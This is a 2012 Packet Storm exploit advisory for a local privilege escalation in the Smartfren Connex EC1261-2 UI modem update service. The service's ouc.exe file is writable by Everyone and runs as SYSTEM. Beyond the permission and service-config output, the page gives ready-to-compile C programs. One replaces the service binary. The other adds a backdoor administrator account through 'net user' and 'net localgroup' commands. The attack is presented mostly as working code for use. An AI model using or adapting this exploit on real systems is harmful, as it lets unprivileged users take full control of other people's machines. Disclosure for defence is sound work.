exploit the possibilities

Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation

Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation
Posted Sep 27, 2012
Authored by X-Cisadane

Smartfren Connex EC 1261-2 UI OUC suffers from a local privilege escalation vulnerability.

tags | exploit, local
MD5 | be22d1ef4ad1c98bde040010f7fea2c3

Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation

Change Mirror Download
==========================================================================
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
==========================================================================

:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
: # Date : 26 September 2012
: # Author : X-Cisadane
: # Software Link : http://www.smartfren.com/data/ec1261.html
: # File Version : 21.005.15.03.836
: # Category : Desktop (Windows) Applications
: # Platform : Win32 & Win64
: # Vulnerability : Local Privilege Escalation Vulnerability
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary
========
Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files.
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.

Description
===========
Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice.
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges.
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).

Proof of Concept
================
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

----------------------------------------------------------------------------------------------
The following attack scenario could be used :
1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file.
For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
Rename the file to ouc.exe.old
2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
3. Restart the system.
After restart attackers malicious file will be executed with SYSTEM privileges.

You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:\sploit.cpp

#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{

MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
return 0;
}


Compile these script below with Dev-C++
Save in the C:\bin.cpp

#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:\
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close